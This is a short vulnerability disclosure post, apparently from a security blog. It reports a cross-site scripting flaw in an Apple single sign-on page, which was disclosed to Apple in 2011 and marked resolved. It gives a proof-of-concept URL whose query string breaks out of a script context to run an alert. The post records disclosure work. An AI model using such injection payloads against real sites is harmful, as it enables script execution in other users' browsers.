Reported to Apple Product Security on September 29, 2011 and reported as Resolved at URL http://support.apple.com/kb/HT1318 which should be reviewed if you've found a Bug or Vulnerability in an Apple Product or Service.
PoC URL https://wdg2.apple.com/ssowebapp/visiblepage.jsp?appID=21&"%3balert(String.fromCharCode(88,83,83))//xss=1
No comments:
Post a Comment